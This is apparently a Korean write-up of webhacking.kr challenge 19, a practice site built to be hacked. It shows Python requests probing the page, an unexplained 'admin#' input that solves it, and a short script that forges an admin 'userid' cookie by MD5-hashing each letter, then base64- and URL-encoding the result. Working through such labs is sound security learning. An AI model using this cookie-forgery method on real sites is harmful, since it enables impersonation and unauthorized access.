# 문제

![19-01](img/19-01.PNG)

![19-02](img/19-02.PNG)

정보가 너무 적다. python으로 request를 보내보자.

In [1]:
import requests

In [2]:
with requests.Session() as s:
    data = {'id':'new_ch','pw':'0123'}
    statuscode = s.post('https://webhacking.kr/login.php/?login', data=data)
    print(statuscode.status_code)
    
    print('\n\n')
    
    r = s.get('https://webhacking.kr/challenge/js-6/?id=admin')
    print(r.text)

200



<html>
<head>
<title>Challenge 19</title>
<style type="text/css">
body { background:black; color:white; font-size:10pt; }
input { background:silver; color:black; font-size:9pt; }
</style>
</head>
<body>
you are not admin<meta http-equiv=refresh content=3;url=./>


python으로도 딱히 얻을게 없는 것 같다.

admin말고 임의의 값을 넣어보자.

![19-03](img/19-03.PNG)

화면이 변했지만 여기도 크게 볼건 없어 보인다.
다음은 ?logout=1을 확인해보자

In [5]:
with requests.Session() as s:
    data = {'id':'new_ch','pw':'0123'}
    statuscode = s.post('https://webhacking.kr/login.php/?login', data=data)
    print(statuscode.status_code)
    
    print('\n\n')
    
    r = s.get('https://webhacking.kr/challenge/js-6/?logout=1')
    print(r.text)

200



<meta http-equiv=refresh content=0;url=./>


다시 처음으로 돌아간다. 그럼 logout을 1이 아닌 값을 넣어보자.

In [13]:
with requests.Session() as s:
    data = {'id':'new_ch','pw':'0123'}
    statuscode = s.post('https://webhacking.kr/login.php/?login', data=data)
    print(statuscode.status_code)
    
    print('\n\n')
    for i in range(0,3):
        r = s.get('https://webhacking.kr/challenge/js-6/?logout='+str(i))
        print(i, r.text)

200



0 <html>
<head>
<title>Challenge 19</title>
<style type="text/css">
body { background:black; color:white; font-size:10pt; }
input { background:silver; color:black; font-size:9pt; }
</style>
</head>
<body>
<form>
id : <input type=text name=id value='admin' maxlength=5 size=5>
<input type=submit>
</form>
</body>
</html>

1 <meta http-equiv=refresh content=0;url=./>
2 <html>
<head>
<title>Challenge 19</title>
<style type="text/css">
body { background:black; color:white; font-size:10pt; }
input { background:silver; color:black; font-size:9pt; }
</style>
</head>
<body>
<form>
id : <input type=text name=id value='admin' maxlength=5 size=5>
<input type=submit>
</form>
</body>
</html>



?logout=1은 별 상관이 없는거 같다.

크롬-개발자도구-Application-Cookies 에서 임의로 접속한 후 만들어진 userid쿠키를 삭제해서 세션을 끊고 다시 메인 화면으로 돌아오자.

흠. 그 다음에 눈에 띄는게 input값에 maxlength속성인데, 이것때문에 input에 5글자밖에 안들어간다.

![19-04](img/19-04.PNG)

이걸 늘려서 5글자 이상을 입력하라는 건거 싶다.

![19-05](img/19-05.PNG)

입력 가능한 input이 주어지고, 이 값을 토대로 로그인하는 기능이라. SQL인젝션인가. 아직 뭘해야하는건지 감이 잡히질 않으니까 하나씩 해보자. 일던 admin# 같은 거부터.

![19-06](img/19-06.PNG)

뭔데.

# 기타

문제를 풀긴 했는데 왜 풀렸는지를 모르겠다. 조금 더 살펴보자.

주석(#)에 뭔가 있었던거 같다. 이번엔 #만 넣어보자

![19-07](img/19-07.PNG)

에러창이 떴다. 

guest# 라고 넣어보자.

![19-08](img/19-08.PNG)

그냥 guest랑 차이가 없다.

정리해보자.

1) admin 입력 : 로그인 실패. you are not admin
2) # 입력 : 로그인 실패. error
3) admin# 입력 : 로그인 성공. 문제가 풀린다.
4) admin을 제외한 임의값 입력 : 로그인 성공. hello 임의값

아무값으로나 로그인되는거보면 DB는 없는걸로 보인다. 애초에 내가 입력하긴 했지만 admin#는 SQLi라고 보기는 조금 이상하다.<br>
굳이 SQL문으로 만들자면 이런 거이지 않을까.<br>
SELECT xcolumn FROM table WHERE name='admin#' or column2 = True

이러면 name='admin 이 되버리는데. 아무리 생각해도 admin#은 정상적인 공격이 아니었다.

흠

나는 문제를 스스로 해결했으니까 큼큼... 풀이 정도는 봐도 되지 않을까,,,?

보자

# 다른 사람들의 풀이

결론적으로 나처럼 푼 사람은 없었고, 원래는 쿠키값을 이용해서 푸는 문제였다. <br>admin이나 asdf같은 문자를 1글자씩 md5()인코딩하고, 전부 더해서 base64()인코딩한게 쿠키에 입력된다. <br>즉, 이 쿠키값을 admin을 인코딩한 값으로 변경해야하는 문제였다.

풀이는 다음과 같다.

1) 임의의 값 'asdf'로 로그인한다.<br>
2) 밑의 파이썬 코드를 이용해서 admin의 쿠키값을 생성한다.

In [15]:
import base64
import hashlib

In [45]:
arr = []
for x in 'admin':
    h = hashlib.md5()
    hex = h.update(x.encode('utf-8'))
    hex = h.hexdigest()
    
    print(len(hex), hex)
    
    arr.append(hex)

32 0cc175b9c0f1b6a831c399e269772661
32 8277e0910d750195b448797616e091ad
32 6f8f57715090da2632453988d9a1501b
32 865c0c0b4ab0e063e5caa3387c1a8741
32 7b8b965ad4bca0e41ab51de7b31363a1


In [55]:
bs64 = ''.join(arr)
print(len(bs64), bs64)

160 0cc175b9c0f1b6a831c399e2697726618277e0910d750195b448797616e091ad6f8f57715090da2632453988d9a1501b865c0c0b4ab0e063e5caa3387c1a87417b8b965ad4bca0e41ab51de7b31363a1


In [84]:
result = base64.b64encode(bs64.encode('utf-8'))
print(len(result), result)

result = result.replace("=".encode(),'%'.encode()+format(ord('='),'#x').encode()[2:])
print(len(result), result)

216 b'MGNjMTc1YjljMGYxYjZhODMxYzM5OWUyNjk3NzI2NjE4Mjc3ZTA5MTBkNzUwMTk1YjQ0ODc5NzYxNmUwOTFhZDZmOGY1NzcxNTA5MGRhMjYzMjQ1Mzk4OGQ5YTE1MDFiODY1YzBjMGI0YWIwZTA2M2U1Y2FhMzM4N2MxYTg3NDE3YjhiOTY1YWQ0YmNhMGU0MWFiNTFkZTdiMzEzNjNhMQ=='
220 b'MGNjMTc1YjljMGYxYjZhODMxYzM5OWUyNjk3NzI2NjE4Mjc3ZTA5MTBkNzUwMTk1YjQ0ODc5NzYxNmUwOTFhZDZmOGY1NzcxNTA5MGRhMjYzMjQ1Mzk4OGQ5YTE1MDFiODY1YzBjMGI0YWIwZTA2M2U1Y2FhMzM4N2MxYTg3NDE3YjhiOTY1YWQ0YmNhMGU0MWFiNTFkZTdiMzEzNjNhMQ%3d%3d'


3) 맨 마지막에 나온값의 asdf의 userid쿠키 값에 입력한다.<br>
4) 성공

# 기타

원래의 풀이법을 알았지만 내가 처음 사용했던 방법은 원리가 어떻게 되는건지는 아직도 모르겠다. 제작자의 의도였을지 아니면 그냥 버그인지도 모르겠다. 구글링해도 나오는게 없고, 게시판에 물어보고 싶기는 한데...

![19-09](img/19-09.PNG)

큿... 점수가 부족하다.<br> 나중에 1000점을 넘기고 생각하면 한 번 물어봐야겠다.